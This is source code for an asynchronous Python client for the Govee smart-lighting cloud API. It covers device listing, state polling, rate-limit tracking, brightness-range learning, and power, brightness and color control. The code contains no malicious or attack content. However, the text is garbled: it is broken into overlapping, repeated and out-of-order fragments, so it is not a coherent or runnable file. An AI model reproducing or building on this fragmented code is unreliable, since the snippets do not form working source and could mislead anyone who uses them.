result, err", "we are online self._track_rate_limit(response) # return the async content manager response yield response", "return the async content manager response yield response except aiohttp.ClientError as ex: #", ") self._devices[device_str].error = err else: self._devices[device_str] = state self._devices[device_str].error = None 
return self.devices", "device: err = f\"Invalid device {device_str}, {device}\" else: if brightness < 0 or", "color[1] blue = color[2] if red < 0 or red > 255: err", "controllable\" _LOGGER.debug(f\"control {device_str} not possible: {err}\") elif not command in device.support_cmds: err =", "@property def online(self): \"\"\"Last request was able to connect to the API.\"\"\" return", "-> Tuple[bool, str]: \"\"\"Turn command called by turn_on and turn_off.\"\"\" success = False", "/ 254)) brightness_result_100 = math.ceil(brightness_set_100 * 254 / 100) if device.learned_set_brightness_max == 100:", "active, {self._limit_remaining} of {self._limit} remaining, sleeping for {sleep_sec}s.\" ) await asyncio.sleep(sleep_sec) @property def", "= aiohttp.ClientSession() return self async def __aexit__(self, *err): \"\"\"Async context manager exit.\"\"\" if", "green = color[1] blue = color[2] if red < 0 or red >", "retrievable: bool support_cmds: List[str] support_turn: bool support_brightness: bool support_color: bool support_color_tem: bool online:", "# inform about state change self.events.online(self._online) if not online: # show all devices", "GoveeDevice( device=device_str, model=model_str, device_name=item[\"deviceName\"], controllable=item[\"controllable\"], retrievable=is_retrievable, support_cmds=item[\"supportCmds\"], support_turn=\"turn\" in item[\"supportCmds\"], support_brightness=\"brightness\" in item[\"supportCmds\"],", "call when rate limiting is active.\"\"\" # do we have requests left? if", "\"\"\"Use create method if you want to use this Client without an async", "g, b) where each value may be in range 0-255 \"\"\" success =", "self._api_request_internal( lambda: self._session.get( url=url, headers=self._getHeaders(auth), params=params ) ) as response: yield response @asynccontextmanager", "): \"\"\"Use create method if you want to use this Client without an", "epoch seconds. 
# return state from hisory for n seconds after controlling the", "do not send another control within n seconds after controlling the device DELAY_SET_FOLLOWING_SET_SECONDS", "f\"set_color_temp: invalid value {color_temp}, allowed range 2000-9000\" else: command = \"colorTem\" result, err", "def _learn(self, device): \"\"\"Persist learned information from device DTO.\"\"\" learning_infos: Dict[ str, GoveeLearnedInfo", "we have requests left? if self.rate_limit_remaining <= self.rate_limit_on: # do we need to", "f\"API-Error {response.status} on command {cmd}: {text} for device {device}\" _LOGGER.warning(f\"control {device_str} not possible:", "self, device: Union[str, GoveeDevice], command: str, params: Any ) -> Tuple[Any, str]: \"\"\"Control", "self._get_lock_seconds(device.lock_get_until) if not device: err = f\"Invalid device {device_str}\" elif not device.retrievable: #", "None self._learning_storage = learning_storage if not self._learning_storage: # use an internal learning storage", "config_offline_is_off.\"\"\" return self._config_offline_is_off @config_offline_is_off.setter def config_offline_is_off(self, val: bool): \"\"\" Set global behavour when", "== None: learning_infos = {} if device.device not in learning_infos: learning_infos[device.device] = GoveeLearnedInfo()", "timestamp = self._utcnow() learning_infos = await self._learning_storage._read_cached() for item in result[\"data\"][\"devices\"]: device_str =", "device.learned_set_brightness_max = 100 await self._learn(device) else: if brightness_set > 100: device.learned_set_brightness_max = 254", "self._utcnow() if seconds_lock < 0: seconds_lock = 0 return seconds_lock async def _control(", "headers=self._getHeaders(auth), params=params ) ) as response: yield response @asynccontextmanager async def _api_request_internal(self, request_lambda):", "seconds.\"\"\" return datetime.timestamp(datetime.now()) def _track_rate_limit(self, response): \"\"\"Track rate limiting.\"\"\" if response.status == 429:", 
"_LOGGER.debug( f\"state object returned from cache: {result}, next state for {device.device} from api", "the Client without using an async context manager.\"\"\" await self.__aexit__() def _getHeaders(self, auth:", "= f\"set_color: invalid value {color}, must be tuple with (r, g, b) values\"", "states for all devices from API.\"\"\" _LOGGER.debug(\"get_states\") for device_str in self._devices: state, err", "= f\"Invalid device {device_str}\" elif not device.retrievable: # device {device_str} isn't able to", "# create device DTO devices[device_str] = GoveeDevice( device=device_str, model=model_str, device_name=item[\"deviceName\"], controllable=item[\"controllable\"], retrievable=is_retrievable, support_cmds=item[\"supportCmds\"],", "if ( learning_infos[device.device].set_brightness_max != device.learned_set_brightness_max ): _LOGGER.debug( \"learned device %s uses range 0-%s", "str]: \"\"\"Set color (r, g, b) where each value may be in range", "yield response except aiohttp.ClientError as ex: # we are offline self._set_online(False) err =", "device.device, \"model\": device.model, \"cmd\": cmd} await self.rate_limit_delay() async with self._api_put( url=_API_DEVICES_CONTROL, json=json )", "the actual brightness pull the brightness up to max once.\", device.device, ) changed", "if model_str == \"H6104\": before_set_brightness_turn_on = True # load learned/configured values if device_str", "context manager.\"\"\" self = Govee(api_key, learning_storage=learning_storage) await self.__aenter__() return self async def close(self):", "from events import Events from typing import Any, List, Optional, Tuple, Union import", "\"unknown error: %s\" % repr(ex) if err: class error_response: def __init__(self, err_msg): self._err_msg", "headers=self._getHeaders(auth), json=json ) ) as response: yield response @asynccontextmanager async def _api_get(self, *,", "for multiple processes self._limit = 100 self._limit_remaining = 100 self._limit_reset = 0 
self._config_offline_is_off", "doesn't work if we don't sleep await asyncio.sleep(1) # set brightness as 0..254", "255: err = ( f\"set_color: invalid value {color}, red must be within 0", "= state self._devices[device_str].error = None return self.devices async def _get_device_state( self, device: Union[str,", "prop_brightness = math.floor( prop_brightness * 254 / 100 ) result = self._devices[device_str] result.online", "# we will need to re-learn every time again. self._learning_storage = GoveeAbstractLearningStorage() @classmethod", "self._devices: lst.append(self._devices[dev]) return lst def device(self, device) -> GoveeDevice: \"\"\"Single device from cache.\"\"\"", "device, return success and error message.\"\"\" return await self._turn(device, \"on\") async def turn_off(self,", "False # init Dict and entry for device if learning_infos == None: learning_infos", "_getHeaders(self, auth: bool): \"\"\"Return Request headers with/without authentication.\"\"\" if auth: return {\"Govee-API-Key\": self._api_key}", "output what was lerned, and learn if ( learning_infos[device.device].set_brightness_max != device.learned_set_brightness_max ): _LOGGER.debug(", "if red < 0 or red > 255: err = ( f\"set_color: invalid", "self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color = color return", "async with self._api_get(url=_API_PING, auth=False) as response: result = await response.text() delay = int((time.time()", "is a success result.\"\"\" return \"message\" in result and result[\"message\"] == \"Success\" async", "Get call.\"\"\" async with self._api_request_internal( lambda: self._session.get( url=url, headers=self._getHeaders(auth), params=params ) ) as", "rate_limit_on(self, val): \"\"\"Set the remaining calls that trigger rate limiting.\"\"\" if val >", "brightness_result = brightness_result_100 command = \"brightness\" result, err = await 
self._control(device, command, brightness_set)", "set brightness as 0..100 as 0..254 didn't work brightness_set = brightness_set_100 brightness_result =", "f\"Invalid device {device_str}, {device}\" else: if len(color) != 3: err = f\"set_color: invalid", "api_key self._devices = {} self._rate_limit_on = 5 # safe available call count for", "\"history\" result = self._devices[device_str] _LOGGER.debug( f\"state object returned from cache: {result}, next state", "await asyncio.sleep(sleep_sec) @property def rate_limit_total(self): \"\"\"Rate limit is counted down from this value.\"\"\"", "be above 1\") self._rate_limit_on = val @property def config_offline_is_off(self): \"\"\"Get the global config", "as response: if response.status == 200: device.lock_set_until = ( self._utcnow() + DELAY_SET_FOLLOWING_SET_SECONDS )", "None def __init__( self, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Init", "= None, ): \"\"\"Use create method if you want to use this Client", "except Exception as ex: err = \"unknown error: %s\" % repr(ex) if err:", "-1 async def text(self): return self._err_msg yield error_response(\"_api_request_internal: \" + err) def _utcnow(self):", "device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn on a device, return success and", "device.device not in learning_infos: learning_infos[device.device] = GoveeLearnedInfo() # output what was lerned, and", "device.online = False async def check_connection(self) -> bool: \"\"\"Check connection to API.\"\"\" try:", "= timestamp result.source = \"api\" result.error = None _LOGGER.debug( f\"state returned from API:", "\"brightness range for %s is assumed. If the brightness slider doesn't match the", "window. 
_RATELIMIT_RESET = \"Rate-Limit-Reset\" # The time at which the current rate limit", "{color_temp}, allowed range 2000-9000\" else: command = \"colorTem\" result, err = await self._control(device,", "device_address, device_dto \"\"\" device_str = device if isinstance(device, GoveeDevice): device_str = device.device if", "allowed in {seconds_locked} seconds\" ) else: params = {\"device\": device.device, \"model\": device.model} async", "{cmd}\") await asyncio.sleep(seconds_locked) json = {\"device\": device.device, \"model\": device.model, \"cmd\": cmd} await self.rate_limit_delay()", "= learning_info.before_set_brightness_turn_on config_offline_is_off = learning_info.config_offline_is_off # create device DTO devices[device_str] = GoveeDevice( device=device_str,", "GoveeDevice DTO. returns: device_address, device_dto \"\"\" device_str = device if isinstance(device, GoveeDevice): device_str", "200: result = await response.json() timestamp = self._utcnow() learning_infos = await self._learning_storage._read_cached() for", "= brightness_result_100 result, err = await self._control( device, command, brightness_set ) if not", "getting brightness state.\", device.device, device.learned_get_brightness_max, ) if device.learned_get_brightness_max == 100: _LOGGER.info( \"brightness range", "if \"online\" in prop: prop_online = prop[\"online\"] is True elif \"powerState\" in prop:", "= f\"Invalid device {device_str}, {device}\" else: if not device.controllable: err = f\"Device {device.device}", "-> Tuple[bool, str]: \"\"\"Turn on a device, return success and error message.\"\"\" return", "in prop: prop_color_temp = prop[\"colorTemInKelvin\"] else: _LOGGER.debug(f\"unknown state property '{prop}'\") if not prop_online:", "val): \"\"\"Set the remaining calls that trigger rate limiting.\"\"\" if val > self._limit:", "_api_put(self, *, auth=True, url: str, json): \"\"\"API HTTP Put call.\"\"\" async with self._api_request_internal(", "to get rate limits: {ex}\") if limit_unknown: 
self._limit_remaining -= 1 async def rate_limit_delay(self):", "up to max once.\", device.device, ) changed = True learning_infos[ device.device ].get_brightness_max =", "if not device: err = f\"Invalid device {device_str}\" elif not device.retrievable: # device", "return await self._turn(device, \"off\") async def _turn( self, device: Union[str, GoveeDevice], onOff: str", "learning_infos[ device.device ].set_brightness_max = device.learned_set_brightness_max changed = True if ( learning_infos[device.device].get_brightness_max != device.learned_get_brightness_max", "state online=True, power_state=False, brightness=0, color=(0, 0, 0), color_temp=0, timestamp=timestamp, source=\"history\", error=None, lock_set_until=0, lock_get_until=0,", "call.\"\"\" async with self._api_request_internal( lambda: self._session.put( url=url, headers=self._getHeaders(auth), json=json ) ) as response:", "= f\"API-Error {response.status}: {result}\" return ping_ok_delay, err async def get_devices(self) -> Tuple[List[GoveeDevice], str]:", "int: \"\"\"Get seconds to wait.\"\"\" seconds_lock = utcSeconds - self._utcnow() if seconds_lock <", "limiting.\"\"\" if val > self._limit: raise GoveeError( f\"Rate limiter threshold {val} must be", "await response.json() else: text = await response.text() err = f\"API-Error {response.status} on command", "async def _learn(self, device): \"\"\"Persist learned information from device DTO.\"\"\" learning_infos: Dict[ str,", "return self._err_msg yield error_response(\"_api_request_internal: \" + err) def _utcnow(self): \"\"\"Helper method to get", "not command in device.support_cmds: err = f\"Command {command} not possible on device {device.device}\"", "= int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining = int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset = float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug( f\"Rate limit total: {self._limit},", "specific device.\"\"\" device_str, device = self._get_device(device) result = 
None err = None seconds_locked", "prop: prop_color_temp = prop[\"colorTemInKelvin\"] else: _LOGGER.debug(f\"unknown state property '{prop}'\") if not prop_online: if", "device.learned_get_brightness_max == 100 and prop_brightness > 100 ): device.learned_get_brightness_max = ( 100 #", "Client without using an async context manager.\"\"\" await self.__aexit__() def _getHeaders(self, auth: bool):", "support_cmds=item[\"supportCmds\"], support_turn=\"turn\" in item[\"supportCmds\"], support_brightness=\"brightness\" in item[\"supportCmds\"], support_color=\"color\" in item[\"supportCmds\"], support_color_tem=\"colorTem\" in item[\"supportCmds\"],", "limit_unknown = False except Exception as ex: _LOGGER.warning(f\"Error trying to get rate limits:", "): try: self._limit = int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining = int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset = float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug( f\"Rate", "as we run. # we will need to re-learn every time again. self._learning_storage", "is_retrievable: learned_get_brightness_max = -1 if model_str == \"H6104\": before_set_brightness_turn_on = True # load", "device_name: str controllable: bool retrievable: bool support_cmds: List[str] support_turn: bool support_brightness: bool support_color:", "offline device doesn't change power state. 
True: an offline device is shown as", "logging.getLogger(__name__) _API_BASE_URL = \"https://developer-api.govee.com\" _API_PING = _API_BASE_URL + \"/ping\" _API_DEVICES = _API_BASE_URL +", "asyncio.sleep(1) # set brightness as 0..254 brightness_set = brightness brightness_result = brightness_set brightness_set_100", "if len(color) != 3: err = f\"set_color: invalid value {color}, must be tuple", "state for {device.device} from api allowed in {seconds_locked} seconds\" ) else: params =", "the async content manager response yield response except aiohttp.ClientError as ex: # we", "response except aiohttp.ClientError as ex: # we are offline self._set_online(False) err = \"error", ") changed = True learning_infos[ device.device ].get_brightness_max = device.learned_get_brightness_max if changed: await self._learning_storage._write_cached(learning_infos)", "< 0 or red > 255: err = ( f\"set_color: invalid value {color},", "!= device.learned_set_brightness_max ): _LOGGER.debug( \"learned device %s uses range 0-%s for setting brightness.\",", "blue must be within 0 .. 
254\" else: command = \"color\" command_color =", "is True elif \"powerState\" in prop: prop_power_state = prop[\"powerState\"] == \"on\" elif \"brightness\"", "= int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset = float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug( f\"Rate limit total: {self._limit}, remaining: {self._limit_remaining} in", "before_set_brightness_turn_on = True # load learned/configured values if device_str in learning_infos: learning_info =", "prop_online: if self.config_offline_is_off is not None: # global option if self.config_offline_is_off: prop_power_state =", "import Events from typing import Any, List, Optional, Tuple, Union import aiohttp from", "@config_offline_is_off.setter def config_offline_is_off(self, val: bool): \"\"\" Set global behavour when device is offline.", "autobrightness learning if device.learned_get_brightness_max == None or ( device.learned_get_brightness_max == 100 and prop_brightness", "current rate limit window. _RATELIMIT_RESET = \"Rate-Limit-Reset\" # The time at which the", "send another control within n seconds after controlling the device DELAY_SET_FOLLOWING_SET_SECONDS = 1", "\"API-Error 400\" in err: # Unsupported Cmd Value # set brightness as 0..100", "\"\"\"Set brightness to 0-254.\"\"\" success = False err = None device_str, device =", "prop_online = prop[\"online\"] is True elif \"powerState\" in prop: prop_power_state = prop[\"powerState\"] ==", "= await response.text() err = f\"API-Error {response.status} on command {cmd}: {text} for device", "int] color_temp: int timestamp: int source: str error: str lock_set_until: int lock_get_until: int", "learning_infos: learning_info = learning_infos[device_str] learned_set_brightness_max = learning_info.set_brightness_max learned_get_brightness_max = learning_info.get_brightness_max before_set_brightness_turn_on = learning_info.before_set_brightness_turn_on", "= brightness_result > 0 return success, err async def _learn(self, device): \"\"\"Persist 
learned", "exit.\"\"\" if self._session: await self._session.close() self._session = None def __init__( self, api_key: str,", "before_set_brightness_turn_on = False config_offline_is_off = False # effenctive state # defaults by some", "device DTO.\"\"\" learning_infos: Dict[ str, GoveeLearnedInfo ] = await self._learning_storage._read_cached() changed = False", "True learning_infos[ device.device ].get_brightness_max = device.learned_get_brightness_max if changed: await self._learning_storage._write_cached(learning_infos) async def set_color_temp(", "result: ping_ok_delay = max(1, delay) else: err = f\"API-Result wrong: {result}\" else: result", "device if isinstance(device, GoveeDevice): device_str = device.device if not device_str in self._devices: device", "{\"name\": command, \"value\": params} _LOGGER.debug(f\"control {device_str}: {cmd}\") result = None err = None", "( self._utcnow() + DELAY_SET_FOLLOWING_SET_SECONDS ) device.lock_get_until = ( self._utcnow() + DELAY_GET_FOLLOWING_SET_SECONDS ) result", ") else: result = await response.text() err = f\"API-Error {response.status}: {result}\" # cache", "seconds_lock async def _control( self, device: Union[str, GoveeDevice], command: str, params: Any )", "prop: prop_color = ( prop[\"color\"][\"r\"], prop[\"color\"][\"g\"], prop[\"color\"][\"b\"], ) elif \"colorTemInKelvin\" in prop: prop_color_temp", "err = f\"API-Error {response.status}: {result}\" # cache last get_devices result self._devices = devices", "learned_get_brightness_max = -1 if model_str == \"H6104\": before_set_brightness_turn_on = True # load learned/configured", "range 0-%s for setting brightness.\", device.device, device.learned_set_brightness_max, ) learning_infos[ device.device ].set_brightness_max = device.learned_set_brightness_max", "\"online\" in prop: prop_online = prop[\"online\"] is True elif \"powerState\" in prop: prop_power_state", "result[\"message\"] == \"Success\" async def turn_on(self, device: Union[str, GoveeDevice]) -> 
Tuple[bool, str]: \"\"\"Turn", "Tuple[bool, str]: \"\"\"Turn off a device, return success and error message.\"\"\" return await", "cache.\"\"\" _, device = self._get_device(device) return device @property def online(self): \"\"\"Last request was", "= None return self.devices async def _get_device_state( self, device: Union[str, GoveeDevice] ) ->", "await self.__aexit__() def _getHeaders(self, auth: bool): \"\"\"Return Request headers with/without authentication.\"\"\" if auth:", "state self._devices[device_str].source = \"history\" result = self._devices[device_str] elif seconds_locked: # we just changed", "async def __aexit__(self, *err): \"\"\"Async context manager exit.\"\"\" if self._session: await self._session.close() self._session", "learning config, possibly overridden by a global config class GoveeError(Exception): \"\"\"Base Exception thrown", "def check_connection(self) -> bool: \"\"\"Check connection to API.\"\"\" try: # this will set", "which means there is some room for other clients. \"\"\" return self._rate_limit_on @rate_limit_on.setter", ") limit_unknown = True if ( _RATELIMIT_TOTAL in response.headers and _RATELIMIT_REMAINING in response.headers", "another control within n seconds after controlling the device DELAY_SET_FOLLOWING_SET_SECONDS = 1 @dataclass", "= False config_offline_is_off = False # effenctive state # defaults by some conditions", "above 1\") self._rate_limit_on = val @property def config_offline_is_off(self): \"\"\"Get the global config option", "for %s is assumed. If the brightness slider doesn't match the actual brightness", "f\"set_color: invalid value {color}, green must be within 0 .. 
254\" elif blue", "if \"API-Error 400\" in err: # Unsupported Cmd Value # set brightness as", "self._online def _set_online(self, online: bool): \"\"\"Set the online state and fire an event", "= device.learned_get_brightness_max if changed: await self._learning_storage._write_cached(learning_infos) async def set_color_temp( self, device: Union[str, GoveeDevice],", "Tuple[bool, str]: \"\"\"Set color temperature to 2000-9000.\"\"\" success = False err = None", "last get_devices result self._devices = devices return self.devices, err def _get_device(self, device: Union[str,", "{device_str}, {device}\" else: if color_temp < 2000 or color_temp > 9000: err =", "be within 0 .. 254\" ) elif green < 0 or green >", "aiohttp from govee_api_laggat.__version__ import VERSION from govee_api_laggat.learning_storage import ( GoveeAbstractLearningStorage, GoveeLearnedInfo, ) _LOGGER", "in {self.rate_limit_reset_seconds} seconds\" ) limit_unknown = False except Exception as ex: _LOGGER.warning(f\"Error trying", "response.headers ): try: self._limit = int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining = int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset = float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug(", "invalid value {color}, blue must be within 0 .. 254\" else: command =", "if err: # try again with 0-100 range if \"API-Error 400\" in err:", "async def _get_device_state( self, device: Union[str, GoveeDevice] ) -> Tuple[GoveeDevice, str]: \"\"\"Get state", "\"\"\" self._config_offline_is_off = val @property def devices(self) -> List[GoveeDevice]: \"\"\"Cached devices list.\"\"\" lst", "self._learning_storage: # use an internal learning storage as long as we run. 
#", "command, \"value\": params} _LOGGER.debug(f\"control {device_str}: {cmd}\") result = None err = None if", "learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Use create method if you want to use", "= None, ): \"\"\"Init with an API_KEY and storage for learned values.\"\"\" _LOGGER.debug(\"govee_api_laggat", "of requests remaining in the current rate limit window. _RATELIMIT_RESET = \"Rate-Limit-Reset\" #", "and turn_off.\"\"\" success = False err = None device_str, device = self._get_device(device) if", "= 100 await self._learn(device) else: if brightness_set > 100: device.learned_set_brightness_max = 254 await", "int ) -> Tuple[bool, str]: \"\"\"Set color temperature to 2000-9000.\"\"\" success = False", "brightness: int ) -> Tuple[bool, str]: \"\"\"Set brightness to 0-254.\"\"\" success = False", "= f\"API-Result wrong: {result}\" else: result = await response.text() err = f\"API-Error {response.status}:", "use this Client without an async context manager.\"\"\" self = Govee(api_key, learning_storage=learning_storage) await", ") -> Tuple[bool, str]: \"\"\"Set brightness to 0-254.\"\"\" success = False err =", "device.learned_set_brightness_max = 254 await self._learn(device) if not err: success = self._is_success_result_message(result) if success:", "brightness slider doesn't match the actual brightness pull the brightness up to max", ") learning_infos[ device.device ].set_brightness_max = device.learned_set_brightness_max changed = True if ( learning_infos[device.device].get_brightness_max !=", "0 .. 
254\" ) elif green < 0 or green > 255: err", "= self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].brightness = brightness_result self._devices[device_str].power_state = brightness_result > 0", "state from history self._devices[device_str].source = \"history\" result = self._devices[device_str] _LOGGER.debug( f\"state object returned", "= _API_BASE_URL + \"/v1/devices/control\" _API_DEVICES_STATE = _API_BASE_URL + \"/v1/devices/state\" # API rate limit", "support_turn: bool support_brightness: bool support_color: bool support_color_tem: bool online: bool power_state: bool brightness:", "for device if learning_infos == None: learning_infos = {} if device.device not in", "Events() self._api_key = api_key self._devices = {} self._rate_limit_on = 5 # safe available", "devices(self) -> List[GoveeDevice]: \"\"\"Cached devices list.\"\"\" lst = [] for dev in self._devices:", "result, err = await self._control(device, command, params) success = False if not err:", "False if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source", "self._limit_remaining @property def rate_limit_reset(self): \"\"\"UTC time in seconds when the rate limit will", "await self._control(device, command, params) success = False if not err: success = self._is_success_result_message(result)", "are online self._track_rate_limit(response) # return the async content manager response yield response except", "= {\"r\": red, \"g\": green, \"b\": blue} result, err = await self._control(device, command,", "device_str, err, ) self._devices[device_str].error = err else: self._devices[device_str] = state self._devices[device_str].error = None", "< 0 or brightness > 254: err = f\"set_brightness: invalid value {brightness}, allowed", "success and error message.\"\"\" return await self._turn(device, \"off\") async def _turn( self, device:", "values.\"\"\" 
_LOGGER.debug(\"govee_api_laggat v%s\", VERSION) self._online = True # assume we are online self.events", "success, err async def _learn(self, device): \"\"\"Persist learned information from device DTO.\"\"\" learning_infos:", "# set brightness as 0..254 brightness_set = brightness brightness_result = brightness_set brightness_set_100 =", "success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].power_state = onOff == \"on\" return", "return self async def close(self): \"\"\"Use close when your are finished with the", "= color[2] if red < 0 or red > 255: err = (", "{err}\") else: while True: seconds_locked = self._get_lock_seconds(device.lock_set_until) if not seconds_locked: break; _LOGGER.debug(f\"control {device_str}", "None async with self._api_get(url=_API_PING, auth=False) as response: result = await response.text() delay =", "config_offline_is_off = learning_info.config_offline_is_off # create device DTO devices[device_str] = GoveeDevice( device=device_str, model=model_str, device_name=item[\"deviceName\"],", "= learning_info.get_brightness_max before_set_brightness_turn_on = learning_info.before_set_brightness_turn_on config_offline_is_off = learning_info.config_offline_is_off # create device DTO devices[device_str]", "{device}\" else: if len(color) != 3: err = f\"set_color: invalid value {color}, must", "# device {device_str} isn't able to return state, return 'history' state self._devices[device_str].source =", "the learning config, possibly overridden by a global config class GoveeError(Exception): \"\"\"Base Exception", "if not err: device.learned_set_brightness_max = 100 await self._learn(device) else: if brightness_set > 100:", "if val > self._limit: raise GoveeError( f\"Rate limiter threshold {val} must be below", "yield error_response(\"_api_request_internal: \" + err) def _utcnow(self): \"\"\"Helper method to get utc now", "> 100: device.learned_set_brightness_max = 254 
await self._learn(device) if not err: success = self._is_success_result_message(result)", "{} err = None async with self._api_get(url=_API_DEVICES) as response: if response.status == 200:", "\"model\": device.model, \"cmd\": cmd} await self.rate_limit_delay() async with self._api_put( url=_API_DEVICES_CONTROL, json=json ) as", "auth: return {\"Govee-API-Key\": self._api_key} return {} @asynccontextmanager async def _api_put(self, *, auth=True, url:", "{cmd}: {text} for device {device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") return result, err", "color_temp return success, err async def set_color( self, device: Union[str, GoveeDevice], color: Tuple[int,", "\"Pong\" == result: ping_ok_delay = max(1, delay) else: err = f\"API-Result wrong: {result}\"", "your are finished with the Client without using an async context manager.\"\"\" await", "device in self.devices: device.online = False async def check_connection(self) -> bool: \"\"\"Check connection", "# assumption, as we didn't get anything higher ) if prop_brightness > 100:", "govee_api_laggat.learning_storage import ( GoveeAbstractLearningStorage, GoveeLearnedInfo, ) _LOGGER = logging.getLogger(__name__) _API_BASE_URL = \"https://developer-api.govee.com\" _API_PING", "= None def __init__( self, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ):", "defaults for learned/configured values learned_set_brightness_max = None learned_get_brightness_max = None before_set_brightness_turn_on = False", "API.\"\"\" return self._online def _set_online(self, online: bool): \"\"\"Set the online state and fire", "\"\"\"Init with an API_KEY and storage for learned values.\"\"\" _LOGGER.debug(\"govee_api_laggat v%s\", VERSION) self._online", "True # load learned/configured values if device_str in learning_infos: learning_info = learning_infos[device_str] learned_set_brightness_max", "authentication.\"\"\" if auth: return {\"Govee-API-Key\": self._api_key} return {} 
@asynccontextmanager async def _api_put(self, *,", "+ \"/v1/devices\" _API_DEVICES_CONTROL = _API_BASE_URL + \"/v1/devices/control\" _API_DEVICES_STATE = _API_BASE_URL + \"/v1/devices/state\" #", "yield response @asynccontextmanager async def _api_request_internal(self, request_lambda): \"\"\"API Methond handling all HTTP calls.", "state change self.events.online(self._online) if not online: # show all devices as offline for", "value {color}, blue must be within 0 .. 254\" else: command = \"color\"", "item[\"supportCmds\"], support_brightness=\"brightness\" in item[\"supportCmds\"], support_color=\"color\" in item[\"supportCmds\"], support_color_tem=\"colorTem\" in item[\"supportCmds\"], # defaults for", "the API.\"\"\" return self._online def _set_online(self, online: bool): \"\"\"Set the online state and", "async with self._api_request_internal( lambda: self._session.get( url=url, headers=self._getHeaders(auth), params=params ) ) as response: yield", "len(color) != 3: err = f\"set_color: invalid value {color}, must be tuple with", "return self._limit_reset - self._utcnow() @property def rate_limit_on(self): \"\"\"Remaining calls that trigger rate limiting.", "result[\"data\"][\"devices\"]: device_str = item[\"device\"] model_str = item[\"model\"] is_retrievable = item[\"retrievable\"] # assuming defaults", "context manager enter.\"\"\" self._session = aiohttp.ClientSession() return self async def __aexit__(self, *err): \"\"\"Async", "resulting state object: {result}\" ) else: errText = await response.text() err = f\"API-Error", "= \"history\" result = self._devices[device_str] elif seconds_locked: # we just changed something, return", "result, err = await self._control(device, command, brightness_set) if err: # try again with", "= False # effenctive state # defaults by some conditions if not is_retrievable:", "seconds to wait.\"\"\" seconds_lock = utcSeconds - self._utcnow() if seconds_lock < 0: seconds_lock", "result) -> bool: \"\"\"Given an aiohttp result 
checks if it is a success", "invalid value {brightness}, allowed range 0 .. 254\" else: if brightness > 0", "state object: {result}\" ) else: errText = await response.text() err = f\"API-Error {response.status}:", "DTO.\"\"\" learning_infos: Dict[ str, GoveeLearnedInfo ] = await self._learning_storage._read_cached() changed = False #", "1: raise GoveeError(f\"Rate limiter threshold {val} must be above 1\") self._rate_limit_on = val", "be below {self._limit}\" ) if val < 1: raise GoveeError(f\"Rate limiter threshold {val}", "result.\"\"\" return \"message\" in result and result[\"message\"] == \"Success\" async def turn_on(self, device:", "-> Tuple[List[GoveeDevice], str]: \"\"\"Get and cache devices.\"\"\" _LOGGER.debug(\"get_devices\") devices = {} err =", "== 200: timestamp = self._utcnow() json_obj = await response.json() prop_online = False prop_power_state", "@property def rate_limit_total(self): \"\"\"Rate limit is counted down from this value.\"\"\" return self._limit", "# scale range 0-100 up to 0-254 prop_brightness = math.floor( prop_brightness * 254", "= None err = None async with self._api_get(url=_API_PING, auth=False) as response: result =", "in {seconds_locked} seconds\" ) else: params = {\"device\": device.device, \"model\": device.model} async with", "from contextlib import asynccontextmanager from dataclasses import dataclass from datetime import datetime from", "HTTP Get call.\"\"\" async with self._api_request_internal( lambda: self._session.get( url=url, headers=self._getHeaders(auth), params=params ) )", "needed.\"\"\" _LOGGER.debug(\"ping\") start = time.time() ping_ok_delay = None err = None async with", "before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off ) else: result = await response.text() err = f\"API-Error {response.status}: {result}\"", "= \"history\" self._devices[device_str].color = color return success, err def _get_lock_seconds(self, utcSeconds: int) ->", "blue > 255: err = 
f\"set_color: invalid value {color}, blue must be within", "return state, return 'history' state self._devices[device_str].source = \"history\" result = self._devices[device_str] elif seconds_locked:", "if ( _RATELIMIT_TOTAL in response.headers and _RATELIMIT_REMAINING in response.headers and _RATELIMIT_RESET in response.headers", "break; _LOGGER.debug(f\"control {device_str} is locked for {seconds_locked} seconds. Command waiting: {cmd}\") await asyncio.sleep(seconds_locked)", "of requests you're permitted to make per minute. _RATELIMIT_REMAINING = \"Rate-Limit-Remaining\" # The", "success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color_temp = color_temp return success, err", "self._learn(device) else: if brightness_set > 100: device.learned_set_brightness_max = 254 await self._learn(device) if not", "Optional, Tuple, Union import aiohttp from govee_api_laggat.__version__ import VERSION from govee_api_laggat.learning_storage import (", "def rate_limit_remaining(self): \"\"\"Remaining Rate limit.\"\"\" return self._limit_remaining @property def rate_limit_reset(self): \"\"\"UTC time in", "await self.ping() except: pass return self.online async def ping(self) -> Tuple[float, str]: \"\"\"Ping", "device: Union[str, GoveeDevice], onOff: str ) -> Tuple[bool, str]: \"\"\"Turn command called by", "of {self._limit} remaining, sleeping for {sleep_sec}s.\" ) await asyncio.sleep(sleep_sec) @property def rate_limit_total(self): \"\"\"Rate", "for learned/configured values learned_set_brightness_max = None learned_get_brightness_max = None before_set_brightness_turn_on = False config_offline_is_off", "able to return state, return 'history' state self._devices[device_str].source = \"history\" result = self._devices[device_str]", "def _api_get(self, *, auth=True, url: str, params=None): \"\"\"API HTTP Get call.\"\"\" async with", "the current rate limit window. 
